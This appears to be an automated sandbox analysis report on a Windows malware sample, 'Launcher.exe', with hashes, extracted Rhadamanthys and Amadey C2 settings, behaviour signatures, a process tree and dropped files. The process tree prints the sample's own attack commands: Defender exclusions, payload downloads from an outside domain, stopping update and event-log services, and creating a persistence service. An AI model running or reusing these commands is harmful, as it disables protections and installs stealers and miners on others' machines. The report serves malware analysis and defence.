Resubmissions

28-08-2024 22:02

240828-1x98aszhnk 10

27-08-2024 12:22

240827-pjyrkazgmh 10

Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    28-08-2024 22:02

General

  • Target

    Launcher.exe

  • Size

    364KB

  • MD5

    93fde4e38a84c83af842f73b176ab8dc

  • SHA1

    e8c55cc160a0a94e404f544b22e38511b9d71da8

  • SHA256

    fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

  • SHA512

    48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

  • SSDEEP

    6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Malware Config

Extracted

Family

rhadamanthys

C2

https://45.159.188.37:443/44194499adc4d2b753ee/gcj8ajmp.qnu3f

Extracted

Family

amadey

Version

4.41

Botnet

3dae01

C2

http://185.208.158.116

http://185.209.162.226

http://89.23.103.42

Attributes
  • install_dir

    239f17af5a

  • install_file

    Hkbsse.exe

  • strings_key

    91a6d9abcd7a774809c7ff7ced665178

  • url_paths

    /hb9IvshS01/index.php

    /hb9IvshS02/index.php

    /hb9IvshS03/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies data under HKEY_USERS 51 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3080
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3244
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:796
      • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
        "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4972
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3584
          • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
            "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5020
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1852
            • C:\Users\Admin\AppData\Roaming\services\wget.exe
              "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of FindShellTrayWindow
              PID:1972
            • C:\Users\Admin\AppData\Roaming\services\winrar.exe
              "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01*.* "1\*" C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:1816
            • C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe
              "C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe"
              5⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2500
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 604
                6⤵
                • Program crash
                PID:1756
            • C:\Users\Admin\AppData\Roaming\services\wget.exe
              "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of FindShellTrayWindow
              PID:4308
            • C:\Users\Admin\AppData\Roaming\services\winrar.exe
              "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:2276
            • C:\Users\Admin\AppData\Roaming\services\2plugin27724
              C:\Users\Admin\AppData\Roaming\services\2plugin27724
              5⤵
              • Drops file in System32 directory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4176
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1472
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3688
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  7⤵
                    PID:4552
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop UsoSvc
                  6⤵
                  • Launches sc.exe
                  PID:4136
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  6⤵
                  • Launches sc.exe
                  PID:5072
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop wuauserv
                  6⤵
                  • Launches sc.exe
                  PID:4324
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  6⤵
                  • Launches sc.exe
                  PID:4608
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop dosvc
                  6⤵
                  • Launches sc.exe
                  PID:1016
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1972
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4124
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3528
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:508
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "OZLCSUZD"
                  6⤵
                  • Launches sc.exe
                  PID:3712
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
                  6⤵
                  • Launches sc.exe
                  PID:192
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  6⤵
                  • Launches sc.exe
                  PID:916
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "OZLCSUZD"
                  6⤵
                  • Launches sc.exe
                  PID:3036
              • C:\Users\Admin\AppData\Roaming\services\wget.exe
                "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                • Suspicious use of FindShellTrayWindow
                PID:1048
              • C:\Users\Admin\AppData\Roaming\services\winrar.exe
                "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:64
              • C:\Users\Admin\AppData\Roaming\services\3plugin29563
                C:\Users\Admin\AppData\Roaming\services\3plugin29563
                5⤵
                • Drops file in Windows directory
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2652
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 768
                  6⤵
                  • Program crash
                  PID:3336
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 820
                  6⤵
                  • Program crash
                  PID:4208
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 904
                  6⤵
                  • Program crash
                  PID:2568
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 912
                  6⤵
                  • Program crash
                  PID:1016
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 944
                  6⤵
                  • Program crash
                  PID:4592
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 980
                  6⤵
                  • Program crash
                  PID:508
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 1156
                  6⤵
                  • Program crash
                  PID:4632
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 1192
                  6⤵
                  • Program crash
                  PID:1856
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 1120
                  6⤵
                  • Program crash
                  PID:3848
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4932
      • C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
        C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
        1⤵
        • Drops file in System32 directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1196
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:640
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            3⤵
              PID:4552
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            2⤵
            • Launches sc.exe
            PID:4136
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            2⤵
            • Launches sc.exe
            PID:1780
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            2⤵
            • Launches sc.exe
            PID:1348
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            2⤵
            • Launches sc.exe
            PID:4980
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            2⤵
            • Launches sc.exe
            PID:2284
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            2⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:1884
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            2⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:2348
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            2⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:4760
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            2⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:1144
          • C:\Windows\system32\conhost.exe
            C:\Windows\system32\conhost.exe
            2⤵
              PID:4232
            • C:\Windows\system32\dwm.exe
              dwm.exe
              2⤵
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3712

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Filesize

            45KB

            MD5

            c2d06c11dd1f1a8b1dedc1a311ca8cdc

            SHA1

            75c07243f9cb80a9c7aed2865f9c5192cc920e7e

            SHA256

            91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

            SHA512

            db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            f3db8418620de08b3039b65734fda067

            SHA1

            4676dcb29f9a11cd9d9ffec2098d98c8a8628a33

            SHA256

            7e094b578d17e52a23b87f19ea26df78086c4c519f78845cf2f972aaefb0acfd

            SHA512

            41c8d1a9a6caa274162d838c65e6cae6b185e9d4edfe3220b321b73ca1da5494c6b7a9d74df472b645ff345224ff30bc52aaaa374cab3cfb9db12d6555dc7f51

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f525am04.dox.ps1

            Filesize

            1B

            MD5

            c4ca4238a0b923820dcc509a6f75849b

            SHA1

            356a192b7913b04c54574d18c28d46e6395428ab

            SHA256

            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

            SHA512

            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

          • C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

            Filesize

            12B

            MD5

            338c3e4fe40ba754d25e69f747a7692a

            SHA1

            21dfcdd111aa5d7791cb26d31bdfa6e533235548

            SHA256

            c17f6851f897f3cbb54d8aa5896441846a1eb7649cb9511cf23ca8bb43fa74fc

            SHA512

            7d412269790125f5a5a68286c665c085a2dd3928e72e393c3e7b0a320f76f599d9c23f319609de64d3a77212c44711bf568167b83300e09baceb31c4207f010e

          • C:\Users\Admin\AppData\Roaming\services\0127871.rar

            Filesize

            2.9MB

            MD5

            3ba7655d55f35256e14307d9ab7f560c

            SHA1

            b5d14e76f894b643860e69f5a2d9308d4b0c1fcb

            SHA256

            262bc2b98e4579e3c97376b9f8b7c12f56b0cc75519914057a44b8fc580ded6c

            SHA512

            a73cda3b1d2cbb1cd7f320ee8b31659d2890a958392ef2ce83eacd320357d095680e160bc25efecd82726d541ce38bdc623a4ee75301fbe76e58b96aaab8dc2b

          • C:\Users\Admin\AppData\Roaming\services\02plugins23208.rar

            Filesize

            9.6MB

            MD5

            557b45a8dfe391ada925b428815343a7

            SHA1

            4cee18d01e3a1e3dfbce90a38b9f2687bdb73e90

            SHA256

            da6879957bd50c9fb45a0bed227f521f2398f65dc1a31904a494ec764d3759d3

            SHA512

            42efc37605923263fa5a215c645e56fcc998c4ee5a24e3086911e23ba55f90162ec3be5f908e0ac065c697bd5d3dc4aceb460fa4aa19cea9999db2708ba75bbd

          • C:\Users\Admin\AppData\Roaming\services\03plugins10863.rar

            Filesize

            2.9MB

            MD5

            e8891a8b9d48c36ace38613a3ee58e65

            SHA1

            45b5010846dc9386c57f6a0f3715af951683b0be

            SHA256

            64cb56c7af6ec8628a343e0e1d47e52f9353aae5835f243d177577d7a3ccd05c

            SHA512

            9ec8424ba8d8773d581dd95dc4f70ad9ed529e4640f6061ad8a668966124ee39d734466bf14210d71afdd773c98302e490a47ac89dde1fa6ad1981baf00aa0a4

          • C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe

            Filesize

            467KB

            MD5

            ab2d2914e268ac8754e408bdd6c109cd

            SHA1

            936a1529158b699ebfaf97e937f17936d321920c

            SHA256

            0f5978c1e5026feea6e28485ceb99b48105d73a77517faf40c1e57d638a5cdd4

            SHA512

            c421cb6c41640e1866b891c941151903ad51e04a437b6d90faa6c732f2e98ef4172631453f9a60dcd8c0e4ffd39ec8c13277961c06a4119b10aff91037318fcf

          • C:\Users\Admin\AppData\Roaming\services\2plugin27724

            Filesize

            7.2MB

            MD5

            59dd26d0a0781afb903b222a340a135a

            SHA1

            dc7eb315e84f9e828376d5421108685d997099aa

            SHA256

            d782048432be8fe4ce0fbcaaf54724202ac39a293c2a6ae5cda2c7f04aa2c967

            SHA512

            e4baf948f1023fc04aa9344ed0bde468566a429c4807f584204a6de95113de78dd2faaedad56e064f3023510fe774386a844becd0f9453d53884e31d4b345ed1

          • C:\Users\Admin\AppData\Roaming\services\3plugin29563

            Filesize

            399KB

            MD5

            5886235e78709ba971a3b4cdfdc336ee

            SHA1

            856e9688e3e087489d6d4ef02b7317d3cbc1fff7

            SHA256

            059701aa60117a1adc3c7fbaed00f05e72c97b28bcbd2456805dd6531654d970

            SHA512

            0699b612c13187f89e71b0008221dddab30c3adaef353c21b40fda72f2487eea874f2475f6e9a9a5a23855f20548dae537fa97fcbeabfc1f266f5219dacdb244

          • C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

            Filesize

            3KB

            MD5

            6cced0a38b185030835bf8857633c159

            SHA1

            4f1604d5e67894fb6b054f8ac82122fa8ad69ed6

            SHA256

            f15ae3d7b9d5310f53939148cf8fe58c8078086e934628ad2c3a611a59181e36

            SHA512

            576c4e937b13050ca408445242db266e43c02dc1ec8ea567994594bd624c276bb20c46b94cf54cfe1ac36091bb4cf9959df1403b4838ab15fa10c75f119e18cc

          • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

            Filesize

            364KB

            MD5

            e5c00b0bc45281666afd14eef04252b2

            SHA1

            3b6eecf8250e88169976a5f866d15c60ee66b758

            SHA256

            542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

            SHA512

            2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

          • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

            Filesize

            1KB

            MD5

            f0fc065f7fd974b42093594a58a4baef

            SHA1

            dbf28dd15d4aa338014c9e508a880e893c548d00

            SHA256

            d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

            SHA512

            8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

          • C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

            Filesize

            6KB

            MD5

            6e7b8b4200d14198c2a6c2c7617a78db

            SHA1

            b4d87db35a6cb1630a78e50939317f7c68a5303d

            SHA256

            91436d2eb99775eef9b6e543c089794f851d750924d3aaede3627623fd0a7f2e

            SHA512

            72aaa8307509aa26782e3954511f0d6306c9cffce312566b91036f173cd763f2d621f907cc3646cb0c0881ef066b7ec10d784eeb4c47c732812bb3eb3ddeb99d

          • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

            Filesize

            364KB

            MD5

            93fde4e38a84c83af842f73b176ab8dc

            SHA1

            e8c55cc160a0a94e404f544b22e38511b9d71da8

            SHA256

            fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

            SHA512

            48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

          • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

            Filesize

            1KB

            MD5

            1b6de83d3f1ccabf195a98a2972c366a

            SHA1

            09f03658306c4078b75fa648d763df9cddd62f23

            SHA256

            e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

            SHA512

            e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

          • C:\Users\Admin\AppData\Roaming\services\wget.exe

            Filesize

            4.9MB

            MD5

            8c04808e4ba12cb793cf661fbbf6c2a0

            SHA1

            bdfdb50c5f251628c332042f85e8dd8cf5f650e3

            SHA256

            a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

            SHA512

            9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

          • C:\Users\Admin\AppData\Roaming\services\winrar.exe

            Filesize

            2.1MB

            MD5

            f59f4f7bea12dd7c8d44f0a717c21c8e

            SHA1

            17629ccb3bd555b72a4432876145707613100b3e

            SHA256

            f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

            SHA512

            44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

          • memory/1048-337-0x0000000000400000-0x00000000008F2000-memory.dmp

            Filesize

            4.9MB

          • memory/1196-521-0x000002AAEF250000-0x000002AAEF26C000-memory.dmp

            Filesize

            112KB

          • memory/1196-527-0x000002AAEF270000-0x000002AAEF329000-memory.dmp

            Filesize

            740KB

          • memory/1472-356-0x000001AD76830000-0x000001AD768A6000-memory.dmp

            Filesize

            472KB

          • memory/1472-352-0x000001AD76680000-0x000001AD766A2000-memory.dmp

            Filesize

            136KB

          • memory/1472-402-0x000001AD767C0000-0x000001AD767CA000-memory.dmp

            Filesize

            40KB

          • memory/1852-72-0x000000006F8C0000-0x000000006F90B000-memory.dmp

            Filesize

            300KB

          • memory/1852-73-0x0000000009A80000-0x0000000009A9E000-memory.dmp

            Filesize

            120KB

          • memory/1852-78-0x0000000009AE0000-0x0000000009B85000-memory.dmp

            Filesize

            660KB

          • memory/1852-271-0x0000000009D60000-0x0000000009D7A000-memory.dmp

            Filesize

            104KB

          • memory/1852-276-0x0000000009D50000-0x0000000009D58000-memory.dmp

            Filesize

            32KB

          • memory/1852-71-0x0000000009AA0000-0x0000000009AD3000-memory.dmp

            Filesize

            204KB

          • memory/1972-294-0x0000000000400000-0x00000000008F2000-memory.dmp

            Filesize

            4.9MB

          • memory/2216-498-0x0000000140000000-0x0000000140E3D000-memory.dmp

            Filesize

            14.2MB

          • memory/2500-306-0x0000000003170000-0x0000000003570000-memory.dmp

            Filesize

            4.0MB

          • memory/2500-307-0x0000000003170000-0x0000000003570000-memory.dmp

            Filesize

            4.0MB

          • memory/2500-308-0x00007FFD1D9B0000-0x00007FFD1DB8B000-memory.dmp

            Filesize

            1.9MB

          • memory/2500-310-0x0000000075850000-0x0000000075A12000-memory.dmp

            Filesize

            1.8MB

          • memory/2500-317-0x0000000000400000-0x000000000047E000-memory.dmp

            Filesize

            504KB

          • memory/2652-347-0x0000000000400000-0x000000000046F000-memory.dmp

            Filesize

            444KB

          • memory/3244-313-0x0000000004610000-0x0000000004A10000-memory.dmp

            Filesize

            4.0MB

          • memory/3244-311-0x0000000000CD0000-0x0000000000CD9000-memory.dmp

            Filesize

            36KB

          • memory/3244-316-0x0000000075850000-0x0000000075A12000-memory.dmp

            Filesize

            1.8MB

          • memory/3244-314-0x00007FFD1D9B0000-0x00007FFD1DB8B000-memory.dmp

            Filesize

            1.9MB

          • memory/3584-18-0x0000000007A40000-0x0000000007A62000-memory.dmp

            Filesize

            136KB

          • memory/3584-19-0x0000000008200000-0x0000000008266000-memory.dmp

            Filesize

            408KB

          • memory/3584-23-0x0000000008D20000-0x0000000008D6B000-memory.dmp

            Filesize

            300KB

          • memory/3584-42-0x000000000A160000-0x000000000A65E000-memory.dmp

            Filesize

            5.0MB

          • memory/3584-16-0x0000000004FF0000-0x0000000005026000-memory.dmp

            Filesize

            216KB

          • memory/3584-17-0x0000000007AF0000-0x0000000008118000-memory.dmp

            Filesize

            6.2MB

          • memory/3584-22-0x00000000087F0000-0x000000000880C000-memory.dmp

            Filesize

            112KB

          • memory/3584-21-0x00000000083E0000-0x0000000008730000-memory.dmp

            Filesize

            3.3MB

          • memory/3584-20-0x0000000008370000-0x00000000083D6000-memory.dmp

            Filesize

            408KB

          • memory/3584-39-0x0000000009BC0000-0x0000000009C54000-memory.dmp

            Filesize

            592KB

          • memory/3584-41-0x0000000009980000-0x00000000099A2000-memory.dmp

            Filesize

            136KB

          • memory/3584-24-0x0000000008A50000-0x0000000008AC6000-memory.dmp

            Filesize

            472KB

          • memory/3584-40-0x0000000009930000-0x000000000994A000-memory.dmp

            Filesize

            104KB

          • memory/3712-665-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-662-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-676-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-675-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-661-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-663-0x00000194FF230000-0x00000194FF250000-memory.dmp

            Filesize

            128KB

          • memory/3712-666-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-667-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

          • memory/3712-668-0x0000000140000000-0x0000000140848000-memory.dmp

            Filesize

            8.3MB

